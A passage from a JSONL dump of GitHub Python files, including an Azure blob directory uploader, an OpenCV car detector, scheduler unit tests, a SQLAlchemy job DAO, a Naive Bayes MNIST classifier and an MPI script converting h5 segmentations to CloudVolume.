{value}')","repo_name":"cdlavila/python","sub_path":"15_loops.py","file_name":"15_loops.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6080948693","text":"from azure.storage.blob import BlobClient, BlobServiceClient\nimport os\n\nclass DirectoryClient:\n def __init__(self, connection_string, container_name):\n service_client = BlobServiceClient.from_connection_string(connection_string)\n self.client = service_client.get_container_client(container_name)\n\n def upload(self, source, dest):\n '''\n Upload a file or directory to a path inside the container\n '''\n if (os.path.isdir(source)):\n self.upload_dir(source, dest)\n else:\n self.upload_file(source, dest)\n\n def upload_file(self, source, dest):\n '''\n Upload a single file to a path inside the container\n '''\n print(f'Uploading {source} to {dest}')\n with open(source, 'rb') as data:\n self.client.upload_blob(name=dest, data=data, overwrite=True)\n\n def upload_dir(self, source, dest):\n '''\n Upload a directory to a path inside the container\n '''\n prefix = '' if dest == '' else dest + '/'\n prefix += os.path.basename(source) + '/'\n for root, dirs, files in os.walk(source):\n for name in files:\n dir_part = os.path.relpath(root, source)\n dir_part = '' if dir_part == '.' else dir_part + '/'\n file_path = os.path.join(root, name)\n blob_path = prefix + dir_part + name\n self.upload_file(file_path, blob_path)\n\n def ls_files(self, path, recursive=False):\n '''\n List files under a path, optionally recursively\n '''\n if not path == '' and not path.endswith('/'):\n path += '/'\n\n blob_iter = self.client.list_blobs(name_starts_with=path)\n files = []\n for blob in blob_iter:\n relative_path = os.path.relpath(blob.name, path)\n if recursive or not '/' in relative_path:\n files.append(relative_path)\n return files\n","repo_name":"chaiwee/backupDBtoAzureStorage","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"30214568909","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Apr 30 05:32:43 2020\n\n@author: Azeemushan\n\"\"\"\n\nimport cv2\nimport time \nimport numpy as np\n\nclassifier = cv2.CascadeClassifier(r'haarcascade_car.xml')\ncap = cv2.VideoCapture('cars.avi')\ncount=0\nwhile cap.isOpened():\n ret,frame = cap.read()\n if ret:\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n cars = classifier.detectMultiScale(gray,1.3,3)\n for (x,y,w,h) in cars:\n cv2.rectangle(frame,(x,y),(x+w,y+h),(0,255,255),2)\n cv2.imshow(\"Cars\",frame)\n cv2.imwrite(\"./frames/frame%d.jpg\" % count, frame)\n count += 1\n if cv2.waitKey(1) == 13:\n break\n else:\n print(\"Video Ended\")\n break\ncap.release()\ncv2.destroyAllWindows()\n\n","repo_name":"azeemushanali/MiniProjects","sub_path":"Computer Vision/Car Detection/car_detection.py","file_name":"car_detection.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"73124038003","text":"# coding: utf-8\nfrom __future__ import unicode_literals\n\nfrom unittest import TestCase\nfrom ..ctm.Session import BaseSession, MorningSession, AfternoonSession\nfrom ..ctm.Exception import OutOfSessionDurationError\nfrom ..ctm.Talk import Talk\nfrom ..ctm.setting import AFTERNOON_DURATION, EXTRA_DURATION\n\nimport datetime\n\n\nclass TestBaseSession(TestCase):\n 
def setUp(self):\n        test_talk_list = []\n        for i in range(1, 4):\n            talk = Talk('test{0}'.format(i), '{0}min'.format(i*10), '0{0}:00PM')\n            test_talk_list.append(talk)\n        self.talk_list = test_talk_list\n        self.base_session = BaseSession()\n\n    def test_check_duration(self):\n        res = self.base_session.check_duration(datetime.timedelta(minutes=1))\n        self.assertEqual(res, False)\n        res = self.base_session.check_duration(datetime.timedelta(minutes=0))\n        self.assertEqual(res, True)\n\n    def test_check_talk_list(self):\n        res = self.base_session._check_talk_list(self.talk_list)\n        self.assertEqual(res, False)\n        res = self.base_session._check_talk_list([])\n        self.assertEqual(res, True)\n\n    def test_format_datetime(self):\n        self.assertEqual('05:00PM', self.base_session.format_datetime(datetime.datetime(1900, 1, 1, 17, 0)))\n\n\nclass TestMorningSession(TestCase):\n    def setUp(self):\n        test_talk_list = []\n        for i in range(1, 4):\n            talk = Talk('test{0}'.format(i), '{0}min'.format(i*10), '0{0}:00PM')\n            test_talk_list.append(talk)\n        self.talk_list = test_talk_list\n        self.session = MorningSession()\n        self.session.talk_list = self.talk_list\n\n    def test_sort_talk_list(self):\n        self.session._sort_talk_list()\n        self.assertEqual(self.session.talk_list[1].start_at, '09:10AM')\n\n    def test_get_talk_list_duration(self):\n        self.assertEqual(self.session.get_talk_list_duration(), 60)\n\n\nclass TestAfternoonSession(TestCase):\n    def setUp(self):\n        self.session = AfternoonSession()\n\n    def test_check_duration(self):\n        res = self.session.check_duration(datetime.timedelta(minutes=AFTERNOON_DURATION+EXTRA_DURATION))\n        self.assertEqual(res, True)\n        res = self.session.check_duration(datetime.timedelta(minutes=AFTERNOON_DURATION+EXTRA_DURATION+1))\n        self.assertEqual(res, False)\n\n","repo_name":"bluedazzle/CTM","sub_path":"src/test/test_Session.py","file_name":"test_Session.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"37058474905","text":"from sqlalchemy.orm import Session\nfrom module_admin.entity.do.job_do import SysJob\nfrom module_admin.entity.vo.job_vo import JobModel\nfrom utils.time_format_util import list_format_datetime, object_format_datetime\n\n\nclass JobDao:\n    \"\"\"\n    Database access layer for the scheduled-job management module\n    \"\"\"\n\n    @classmethod\n    def get_job_detail_by_id(cls, db: Session, job_id: int):\n        \"\"\"\n        Get the details of a scheduled job by its job id\n        :param db: orm session object\n        :param job_id: scheduled job id\n        :return: scheduled job info object\n        \"\"\"\n        job_info = db.query(SysJob) \\\n            .filter(SysJob.job_id == job_id) \\\n            .first()\n\n        return object_format_datetime(job_info)\n\n    @classmethod\n    def get_job_detail_by_info(cls, db: Session, job: JobModel):\n        \"\"\"\n        Get scheduled job info matching the given job parameters\n        :param db: orm session object\n        :param job: scheduled job parameter object\n        :return: scheduled job info object\n        \"\"\"\n        job_info = db.query(SysJob) \\\n            .filter(SysJob.job_name == job.job_name if job.job_name else True,\n                    SysJob.job_group == job.job_group if job.job_group else True,\n                    SysJob.invoke_target == job.invoke_target if job.invoke_target else True,\n                    SysJob.cron_expression == job.cron_expression if job.cron_expression else True) \\\n            .first()\n\n        return job_info\n\n    @classmethod\n    def get_job_list(cls, db: Session, query_object: JobModel):\n        \"\"\"\n        Get the list of scheduled jobs matching the query parameters\n        :param db: orm session object\n        :param query_object: query parameter object\n        :return: list of scheduled job info objects\n        \"\"\"\n        job_list = db.query(SysJob) \\\n            .filter(SysJob.job_name.like(f'%{query_object.job_name}%') if query_object.job_name else True,\n                    SysJob.job_group == query_object.job_group if query_object.job_group else True,\n                    SysJob.status == query_object.status if query_object.status else True\n                    ) \\\n            .distinct().all()\n\n        return list_format_datetime(job_list)\n\n    @classmethod\n    def get_job_list_for_scheduler(cls, db: Session):\n        \"\"\"\n        Get the list of scheduled jobs for the scheduler\n        :param db: orm session object\n        :return: list of scheduled job info objects\n        \"\"\"\n        job_list = db.query(SysJob) \\\n            .filter(SysJob.status == 0) \\\n            .distinct().all()\n\n        return list_format_datetime(job_list)\n\n    @classmethod\n    def add_job_dao(cls, db: Session, job: JobModel):\n        \"\"\"\n        Database operation for adding a scheduled job\n        :param db: orm session object\n        :param job: scheduled job object\n        :return:\n        \"\"\"\n        db_job = SysJob(**job.dict())\n        db.add(db_job)\n        db.flush()\n\n        return db_job\n\n    @classmethod\n    def edit_job_dao(cls, db: Session, job: dict):\n        \"\"\"\n        Database operation for editing a scheduled job\n        :param db: orm session object\n        :param job: dict of scheduled job fields to update\n        :return:\n        \"\"\"\n        db.query(SysJob) \\\n            .filter(SysJob.job_id == job.get('job_id')) \\\n            .update(job)\n\n    @classmethod\n    def delete_job_dao(cls, db: Session, job: JobModel):\n        \"\"\"\n        Database operation for deleting a scheduled job\n        :param db: orm session object\n        :param job: scheduled job object\n        :return:\n        \"\"\"\n        db.query(SysJob) \\\n            .filter(SysJob.job_id == job.job_id) \\\n            .delete()\n","repo_name":"insistence/Dash-FastAPI-Admin","sub_path":"dash-fastapi-backend/module_admin/dao/job_dao.py","file_name":"job_dao.py","file_ext":"py","file_size_in_byte":3531,"program_lang":"python","lang":"en","doc_type":"code","stars":64,"dataset":"github-code","pt":"75"}
{"seq_id":"21057935195","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 19 19:52:59 2019\n\n@author: Yanis\n\"\"\"\n\n# Classification template\n\n# Importing the libraries\nimport numpy as np\nimport math\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport matplotlib.pyplot as plt\nfrom sklearn.ensemble import RandomForestClassifier\nfrom PIL import Image\nfrom skimage import transform\nimport os\n\nnp.random.seed(123)\n\nfrom scipy.io import loadmat\nfrom scipy.stats import norm, bernoulli\nfrom six.moves import urllib\n\n\ndef NaiveBayes(X_train, y_train, X_test, plot = False):\n    # prepare model\n    class_division = {}\n    y_train = list(y_train)\n\n    for index, feature_vector in X_train.iterrows():\n        feature_vector=list(feature_vector)\n        if y_train[index] not in class_division:\n            class_division[y_train[index]] = []  \n        class_division[y_train[index]].append(feature_vector)\n    \n    mean_std_tuples = {}\n    for label, instances in class_division.items():\n        mean_std_tuples[label] = group_mean_std_tuples(instances)\n    \n    #plot mean images\n    if plot:\n        for key, values in mean_std_tuples.items():\n            means = [mean for mean, std in values]\n            means.append(0)\n            plot_mean_image(means, key)\n    \n    predictions = bulk_predict(mean_std_tuples, X_test, class_division)\n\n    return predictions\n\ndef estimate_prior_prob(training_class_set):\n    prior_prob = {}\n    for i in range(10):\n        prior_prob[i] = len(training_class_set[i]) / len(train)\n    \n    return prior_prob\n\ndef view_image(image, label=\"\"):\n    \"\"\"View a single image.\"\"\"\n    print(\"Label: %s\" % label)\n    width = int(math.sqrt(len(image)))\n    two_d = (np.reshape(image, (width, width))).astype(np.uint8)\n    plt.title(\"Label: %s\" % label)\n    plt.imshow(two_d,cmap=plt.cm.gray, origin='upper', interpolation='nearest')\n    return plt\n    \ndef plot_mean_image(vector,label):\n    view_image(vector,label).show()\n    \ndef group_mean_std_tuples(dataset):\n    mean_std_tuples = []\n    for vector in zip(*dataset):\n        average = mean(vector)\n        std = standard_deviation(average, vector)\n        mean_std_tuples.append((average,std))\n    del mean_std_tuples[-1] #remove the last label column 
summaries\n    return mean_std_tuples\n\ndef mean(numbers):\n    return sum(numbers) / float(len(numbers))\n\n\ndef standard_deviation(average, numbers):\n    variance = sum([pow(x - average, 2) for x in numbers]) / float(len(numbers) - 1)\n    return math.sqrt(variance) +1\n\n# choose y with largest sum(log(p(Xi|y))) + log(p(y)) \n# Normal distribution for numeric features\n# Y = { 1/[ σ * sqrt(2π) ] } * e^(-(x - μ)^2 / (2σ^2))\n# Source: https://stattrek.com/probability-distributions/normal.aspx\ndef estimate_posterior(x, mean, std, prior):\n    #print(\"X: {} , mean: {}, std: {}\".format(x,mean,std))\n    #log_probability = np.log(norm.pdf(x,mean,std))+ np.log(prior)\n    exponent = math.exp(-(math.pow(float(x) - mean, 2) / (2 * math.pow(std, 2)))) +1\n    value =1 / (math.sqrt(2 * math.pi) * std) +1\n    return math.log(value * exponent) + math.log(prior + 1)\n    #return log_probability\n\n# for every feature value and the corresponding mean and std use the respective distribution to \n# calculate probabilities of X to belong to any of the chosen classes\ndef estimate_probabilities_per_class(distribution_parameters, test_vector, prior_probabilities):\n    probabilities = {}\n    for label, dist_values in distribution_parameters.items():\n        probabilities[label] = 0 #start the log-probability sum at 0\n        for i in range(len(dist_values)):\n            mean, std = dist_values[i]\n            X = test_vector[i]\n            probabilities[label] = probabilities[label] + estimate_posterior(X, mean, std, prior_probabilities[label])\n    return probabilities\n\n#shuffle the dataframe and take the ratio*data len for training and the rest for testing\ndef split_dataframe(dataframe, train_ratio):\n    dataframe = dataframe.iloc[np.random.permutation(len(dataframe))]\n\n    trainset_len = int(len(dataframe)*train_ratio)\n    trainset = dataframe.iloc[0:trainset_len , : ]\n    testset = dataframe.iloc[trainset_len:len(dataframe) , : ]\n    \n    return trainset,testset\n    \n\n# For given test vector and estimated parameters find the class with the highest probability and assign it to this vector\ndef predict(distribution_parameters, test_vector, prior_probabilities):\n    probabilities = estimate_probabilities_per_class(distribution_parameters, test_vector, prior_probabilities)\n    predicted_label = None\n    max_probability = -1\n\n    for label, probability in probabilities.items():\n        if probability > max_probability:\n            max_probability = probability\n            predicted_label = label\n    return predicted_label\n\n#Calculates the prediction for every row in the test set based on trained data\ndef bulk_predict(distribution_parameters, test_set, class_division):\n    prior_probabilities = estimate_prior_prob(class_division)\n    #print(prior_probabilities)\n    predictions = [predict(distribution_parameters, list(feature_test_vector), prior_probabilities) for index, feature_test_vector in test_set.iterrows()]\n    return predictions\n\n# Estimate % of correct results\ndef estimate_accuracy(test_set, results):\n    correct = 0\n    count = 0\n    for feature_test_vector in test_set:\n        if feature_test_vector == results[count]:\n            correct += 1\n        count = count+ 1\n    return (correct / float(len(test_set)))\n\ndef bernoulli_fitting(X,y):\n    alpha = 1.0\n    count_sample = X.shape[0]\n    separated = [[x for x, t in zip(X, y) if t == c] for c in np.unique(y)]\n    class_log_prior = [np.log(len(i) / count_sample) for i in separated]\n    count = np.array([np.array(i).sum(axis=0) for i in separated]) + alpha\n    smoothing = 2 * alpha\n    n_doc = np.array([len(i) + smoothing for i in separated])\n    feature_prob = count / n_doc[np.newaxis].T\n\n    return class_log_prior,feature_prob\n\n#for each item
in the test set estimate the posterior\ndef predict_log_proba(X, class_log_prior,feature_prob):\n class_probabilities = []\n for x in X:\n #bernoulli.pmf(x, np.log(feature_prob))\n posterior_prob = np.log(feature_prob) * x \n sum_posterior = posterior_prob.sum(axis=1)\n class_probabilities.append(sum_posterior + class_log_prior)\n \n return class_probabilities\n#estimate the class probabilities and get the class with the largest one \ndef bernoulli_predicting(X_test,class_log_prior,feature_prob ):\n class_probabilities = predict_log_proba(X_test,class_log_prior,feature_prob)\n return np.argmax(class_probabilities, axis=1)\n\nmnist_url = \"https://github.com/amplab/datascience-sp14/raw/master/lab7/mldata/mnist-original.mat\"\nmnist_path = \"./mnist-original.mat\"\n\nexists = os.path.isfile(mnist_path)\nif not exists:\n response = urllib.request.urlopen(mnist_url)\n with open(mnist_path, \"wb\") as f:\n content = response.read()\n f.write(content)\nmnist_raw = loadmat(mnist_path)\nmnist = {\n \"data\": mnist_raw[\"data\"].T,\n \"target\": mnist_raw[\"label\"][0],\n \"COL_NAMES\": [\"label\", \"data\"],\n \"DESCR\": \"mldata.org dataset: mnist-original\",\n}\n#number_of_items = 56000\n#features = pd.DataFrame(np.array(mnist[\"data\"][:number_of_items,:], 'int16'))\n#labels = pd.DataFrame(np.array(mnist[\"target\"][:number_of_items], 'int'))\n\nfeatures = pd.DataFrame(np.array(mnist[\"data\"], 'int16'))\nlabels = pd.DataFrame(np.array(mnist[\"target\"], 'int'))\n\ndata = pd.concat([labels, features], axis=1)\ntrain, test = train_test_split(data, test_size=0.2)\n\ntrain_x = np.array(train.iloc[:, 1:])\ntest_x = np.array(test.iloc[:, 1:])\ntrain_y = np.array(train.iloc[:, 0])\ntest_y = np.array(test.iloc[:, 0])\n\n\ntarget_train_y = train_y.astype(np.uint8)\ntarget_test_y = test_y.astype(np.uint8)\n\n\ndef bounding_rescale_strech_image(image):\n initial_size = (28, 28)\n target_size = (20, 20)\n img_matrix = np.array(image).reshape((-1, 1, 28, 28)).astype(np.uint8)\n img = Image.fromarray(img_matrix[0][0])\n threshold_img = img.point(lambda x: 0 if x < 128 else 255, '1')\n img_reshaped = np.reshape(np.array(threshold_img), initial_size)\n row= np.unique(np.nonzero(img_reshaped)[0])\n col = np.unique(np.nonzero(img_reshaped)[1])\n scale_image = img_reshaped[min(row):max(row), min(col):max(col)]\n image_data_new = transform.resize(scale_image, target_size)\n return (np.array(image_data_new).astype(np.uint8))\n\n\ntrain_modified = np.apply_along_axis(bounding_rescale_strech_image, axis=1, arr=train_x)\ntest_modified = np.apply_along_axis(bounding_rescale_strech_image, axis=1, arr=test_x)\n\ntrain_final = np.reshape(train_modified, (train_modified.shape[0], 400))\ntest_final = np.reshape(test_modified, (test_modified.shape[0], 400))\n\n\ndef do_naive_bayes_normal(training_x,training_y, test_x, test_y,case, plot= False):\n result = NaiveBayes(training_x,training_y, test_x, plot)\n\n acc = estimate_accuracy(test_y, result)\n print(\"Accuracy achieved for \" + case + \" is \" + str(acc * 100) + \"%\")\n \ndef do_naive_bayes_bernoulli(training_x, training_y, test_x, test_y, case):\n log_prior, feature_probability = bernoulli_fitting(training_x, training_y)\n result = bernoulli_predicting(test_x, log_prior, feature_probability)\n acc = estimate_accuracy(test_y, result)\n print(\"Accuracy achieved for \" + case + \" is \" + str(acc * 100) + \"%\")\n\n#training_set_final = pd.concat([pd.DataFrame(train_final), pd.DataFrame(target_train_y)], axis=1)\n\ndo_naive_bayes_normal(pd.DataFrame(train_x), train_y, 
pd.DataFrame(test_x),test_y, \"untouched_gaussian\", True)\ndo_naive_bayes_normal(pd.DataFrame(train_final), target_train_y, pd.DataFrame(test_final), target_test_y, \"bounded_stretched_gaussian\")\ndo_naive_bayes_bernoulli(train_x, train_y, test_x, test_y, \"untouched_bernoulli\")\ndo_naive_bayes_bernoulli(train_final, target_train_y, test_final, target_test_y, \"bounded_stretched_bernoulli\")\n\ndef do_random_forest(d, n, train_x1, train_y1, test_x1, test_y1, case):\n    random_forest_model = RandomForestClassifier(max_depth=d, random_state=0, n_estimators=n)\n    random_forest_model.fit(train_x1, train_y1)\n    prediction = random_forest_model.predict(test_x1)\n    acc = estimate_accuracy(test_y1, prediction)\n    print(\"Accuracy achieved for \" + case + \" is \" + str(acc * 100) + \"%\")\n\n\n#do_random_forest(4, 10, train_x, train_y, test_x, test_y, \"4/10 untouched\")\n#do_random_forest(4, 30, train_x, train_y, test_x, test_y, \"4/30 untouched\")\n#do_random_forest(4, 10, train_final, target_train_y, test_final, target_test_y, \"4/10 bounded and stretched\")\n#do_random_forest(4, 30, train_final, target_train_y, test_final, target_test_y, \"4/30 bounded and stretched\")\n\n#do_random_forest(16, 10, train_x, train_y, test_x, test_y, \"16/10 untouched\")\n#do_random_forest(16, 30, train_x, train_y, test_x, test_y, \"16/30 untouched\")\n\n#do_random_forest(16, 10, train_final, target_train_y, test_final, target_test_y, \"16/10 bounded and stretched\")\n#do_random_forest(16, 30, train_final, target_train_y, test_final, target_test_y, \"16/30 bounded and stretched\")","repo_name":"yan6pz/AML-Projects","sub_path":"homework1/problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":11119,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"30879749418","text":"'''Fourth stage in the reconciliation of ffn inference sub volumes.\n\nWorkflow:\n1. Assume object ids in subvols are globally unique as output from first stage.\n2. Find overlap dict between pairs of precomputed volumes and generate object id pairs\n3. Form global reconciliation graph and remap labels \n4. Write into one final precomputed cube\n\n\n1. For each seg-*.npz, load subvol, make label contiguous\n2. Find max id for each subvol and set offset for each subvol\n3. Update each subvol with offset\n4. 
Write to cloudvolume\n\n'''\nimport cloudvolume\nimport re\nimport time\nimport numpy as np\nfrom pprint import pprint\nimport argparse\nimport fastremap\nfrom cloudvolume.lib import Bbox\nfrom ffn.inference.segmentation import make_labels_contiguous\nfrom ffn.inference.segmentation import clear_dust, make_labels_contiguous, clean_up\n# Agglomerate from seg folders and output to cloud volume \n# from klab_utils.ffn.export_inference import load_inference, get_zyx\nimport logging\nimport glob\nimport os\nimport re\nfrom ffn.utils.bounding_box import BoundingBox\nfrom cloudvolume.lib import Bbox\nfrom cloudvolume import CloudVolume\nfrom tqdm import tqdm\nfrom ffn.utils import bounding_box\nfrom ffn.utils.bounding_box import intersection\nimport itertools\nimport networkx as nx\nimport json\nimport pickle\nimport sys\nimport time\nimport h5py\n\nfrom mpi4py import MPI\nmpi_comm = MPI.COMM_WORLD\nmpi_rank = mpi_comm.Get_rank()\nmpi_size = mpi_comm.Get_size()\n\n\ndef get_bbox_from_cv(cvol):\n offset = np.array(cvol.info['scales'][0]['voxel_offset'])\n size = np.array(cvol.info['scales'][0]['size'])\n return Bbox(offset, offset + size)\ndef get_merge_dict(G):\n source_cube = nx.get_node_attributes(G, 'cube')\n conn = nx.connected_components(G)\n\n unique_cubes = np.unique(list(source_cube.values()))\n global_merge_dict = {uid:{} for uid in unique_cubes}\n pbar = tqdm(conn, desc='Find remap for each component')\n for c in pbar:\n c = list(c)\n c.sort()\n for _c in c:\n src_cube = source_cube[_c]\n global_merge_dict[src_cube][_c] = c[0] \n return global_merge_dict \n\n\n\n\ndef prepare_precomputed(\n precomputed_path, \n offset, \n size, \n resolution, \n chunk_size, \n factor=(2,2,1), \n dtype='uint32',\n parallel=False\n ):\n cv_args = dict(\n bounded=True, fill_missing=False, autocrop=False,\n cache=False, compress_cache=None, cdn_cache=False,\n progress=False, provenance=None, compress=True, \n non_aligned_writes=True, parallel=parallel)\n info = CloudVolume.create_new_info(\n num_channels=1,\n layer_type='segmentation',\n data_type=dtype,\n encoding='compressed_segmentation',\n # encoding='raw',\n resolution=list(resolution),\n voxel_offset=np.array(offset),\n volume_size=np.array(size),\n chunk_size=chunk_size,\n max_mip=0,\n factor=factor,\n )\n cv = CloudVolume('file://'+precomputed_path, mip=0, info=info, **cv_args)\n cv.commit_info()\n return cv\ndef merge_g_op(a, b, datatype):\n return nx.compose(a, b)\n\n# def get_union_bbox_and_merge_path(seg_map, merge_output):\n# bbox_list = [v['bbox'] for v in seg_map.values()]\n# minpt = np.min(np.stack([np.array(b.minpt) for b in bbox_list], 0), axis=0)\n# maxpt = np.max(np.stack([np.array(b.maxpt) for b in bbox_list], 0), axis=0)\n \n# union_offset = minpt\n# union_size = maxpt - minpt\n# union_bbox = Bbox(minpt, maxpt)\n# cv_merge_path = '%s/precomputed-%d_%d_%d_%d_%d_%d/' % (merge_output, \n# union_offset[0], union_offset[1], union_offset[2],\n# union_size[0], union_size[1], union_size[2])\n# return union_bbox, cv_merge_path\ndef prewrite(union_bbox, cv_merge_path, resolution, chunk_size):\n union_offset = np.array(union_bbox.minpt)\n union_size = np.array(union_bbox.maxpt) - np.array(union_bbox.minpt)\n padded_union_size = ((union_size-1) // chunk_size + 1 ) * chunk_size\n\n cv_merge = prepare_precomputed(\n cv_merge_path, \n offset=union_offset, \n size=padded_union_size, \n resolution=resolution, \n chunk_size=chunk_size)\n # Pre paint the cv with 0\n # cv_merge[union_bbox] = np.zeros((union_size), dtype=np.uint32)\n \n cv_args = dict(\n 
bounded=False, fill_missing=True, autocrop=False,\n cache=False, compress_cache=None, cdn_cache=False,\n progress=False, provenance=None, compress=True, \n non_aligned_writes=True, parallel=False)\n\n for z_start in range(union_offset[2], union_offset[2] + union_size[2], chunk_size[2]):\n logging.warning('z: %d', z_start)\n # cv_merge[:,:,z_start:z_start+chunk_size[2]] = np.zeros((union_size[0], union_size[1], chunk_size[2]), dtype=np.uint32)\n cv_merge[:,:,z_start:z_start+chunk_size[2]] = np.zeros((padded_union_size[0], padded_union_size[1], chunk_size[2]), dtype=np.uint32)\n logging.info('prewrite_finished')\n\ndef get_union_bbox_and_merge_path(seg_map, merge_output, global_offset):\n seg_map = {k: v for k, v in seg_map.items() if v}\n bbox_list = [v['bbox'] for v in seg_map.values()]\n minpt = np.min(np.stack([np.array(b.minpt) for b in bbox_list], 0), axis=0)\n maxpt = np.max(np.stack([np.array(b.maxpt) for b in bbox_list], 0), axis=0)\n \n union_offset = minpt + global_offset\n union_size = maxpt - minpt\n # union_bbox = Bbox(minpt, maxpt)\n union_bbox = Bbox(union_offset, union_offset + union_size)\n cv_merge_path = '%s/precomputed-%d_%d_%d_%d_%d_%d/' % (merge_output, \n union_offset[0], union_offset[1], union_offset[2],\n union_size[0], union_size[1], union_size[2])\n return union_bbox, cv_merge_path\ndef get_chunk_bboxes(union_bbox, chunk_size):\n ffn_style_bbox = bounding_box.BoundingBox(\n np.array(union_bbox.minpt), np.array(union_bbox.size3()))\n\n calc = bounding_box.OrderlyOverlappingCalculator(\n outer_box=ffn_style_bbox, \n sub_box_size=chunk_size, \n overlap=[0,0,0], \n include_small_sub_boxes=True,\n back_shift_small_sub_boxes=False)\n bbs = [ffn_bb for ffn_bb in calc.generate_sub_boxes()]\n for ffn_bb in bbs:\n logging.warning('sub_bb: %s', ffn_bb)\n return bbs\n\ndef h5_to_cloudvolume(h5_path, cv_path, union_offset, local_sub_bboxes, resolution, \n chunk_size, global_offset=(0, 0, 0), flip_h5=False):\n\n cv_args = dict(\n bounded=False, fill_missing=True, autocrop=False,\n cache=False, compress_cache=None, cdn_cache=False,\n progress=False, provenance=None, compress=True, \n non_aligned_writes=False, parallel=False)\n cv_merge = cloudvolume.CloudVolume('file://' + cv_path, mip=0, **cv_args)\n with h5py.File(h5_path, 'r') as f:\n h5_ds = f['output']\n pbar = tqdm(local_sub_bboxes, desc='h5 to precomputed')\n for ffn_bb in pbar:\n abs_offset = ffn_bb.start\n abs_size = ffn_bb.size\n\n rel_offset = abs_offset - union_offset\n rel_size = abs_size\n\n # logging.warning('write %s %s', abs_offset, abs_size)\n h5_slc = np.s_[\n rel_offset[0]:rel_offset[0] + rel_size[0],\n rel_offset[1]:rel_offset[1] + rel_size[1],\n rel_offset[2]:rel_offset[2] + rel_size[2]\n ]\n\n cv_slc = np.s_[\n abs_offset[0]:abs_offset[0] + abs_size[0],\n abs_offset[1]:abs_offset[1] + abs_size[1],\n abs_offset[2]:abs_offset[2] + abs_size[2],\n 0\n ]\n\n cv_merge[cv_slc] = h5_ds[h5_slc]\n \n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('input', type=str, default=None, \n help='a directory with remapped/precomputed-*, config.pkl, and graph.pkl')\n parser.add_argument('--output', type=str, default=None,\n help='output_directory')\n parser.add_argument('--resolution', type=str, default='6,6,40')\n parser.add_argument('--chunk_size', type=str, default='256,256,64')\n parser.add_argument('--batch_scale', type=int, default=1,\n help='Controls how much data is loaded from h5 each time, by multiplying chunk_size')\n parser.add_argument('--global_offset', type=str, default='0,0,0')\n 
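# --global_offset shifts the merged bounding box into absolute dataset coordinates (see get_union_bbox_and_merge_path)\n    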
parser.add_argument('--flip_h5', type=bool, default=False)\n    parser.add_argument('--verbose', type=bool, default=True)\n    args = parser.parse_args()\n    if args.verbose:\n        logging.basicConfig(level='DEBUG')\n    else:\n        logging.basicConfig(level='ERROR')\n    resolution = [int(i) for i in args.resolution.split(',')]\n    chunk_size = [int(i) for i in args.chunk_size.split(',')]\n    global_offset = [int(i) for i in args.global_offset.split(',')]\n\n    if args.output is None:\n        output = args.input\n    else:\n        output = args.output\n    config_path = os.path.join(args.input, 'config.pkl')\n\n\n    if mpi_rank == 0:\n        assert os.path.exists(config_path), 'Run reconciliate_remap first'\n        with open(config_path, 'rb') as fp:\n            seg_map = pickle.load(fp)\n        os.makedirs(output, exist_ok=True)\n    else:\n        seg_map = None\n    seg_map = mpi_comm.bcast(seg_map, 0)\n    \n    merge_output = os.path.join(output, 'agglomerated')\n    h5_path = os.path.join(output, 'intermediate.h5')\n\n    if mpi_rank == 0:\n        union_bbox, cv_merge_path = get_union_bbox_and_merge_path(seg_map, merge_output, global_offset)\n\n        # preset precomputed\n        union_offset = np.array(union_bbox.minpt)\n        union_size = np.array(union_bbox.maxpt) - np.array(union_bbox.minpt)\n        cv_merge = prepare_precomputed(\n            cv_merge_path, \n            offset=union_offset, \n            size=union_size, \n            resolution=resolution, \n            chunk_size=chunk_size)\n        \n        # sub divide aligned bboxes\n        sub_bbox_size = [i * args.batch_scale for i in chunk_size]\n\n        bbs = get_chunk_bboxes(union_bbox, sub_bbox_size)\n        sub_bbs = np.array_split(bbs, mpi_size) \n        logging.warning('write shapes %s %s', union_bbox, sub_bbox_size)\n\n    else:\n        # union_bbox = None\n        union_offset = None\n        cv_merge_path = None\n        sub_bbs = None\n\n\n    union_offset = mpi_comm.bcast(union_offset, 0)\n    cv_merge_path = mpi_comm.bcast(cv_merge_path, 0)\n    sub_bbs = mpi_comm.scatter(sub_bbs, 0)\n\n    h5_to_cloudvolume(h5_path, cv_merge_path, union_offset, sub_bbs, \n                      resolution, chunk_size, flip_h5=args.flip_h5)\n    sys.exit()\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"Hanyu-Li/klab_utils","sub_path":"klab_utils/ffn/reconciliation/h5_to_cv.py","file_name":"h5_to_cv.py","file_ext":"py","file_size_in_byte":9982,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"}
{"seq_id":"8324726194","text":"\"\"\"\nNAME:\n    inspecting_mmt_ha_nb921_spectra.py\n\nPURPOSE:\n    This code creates a PDF file with 9 subplots per page, inspecting\n    the behavior of MMT Halpha NB921 sources around the Halpha emission\n    line. 
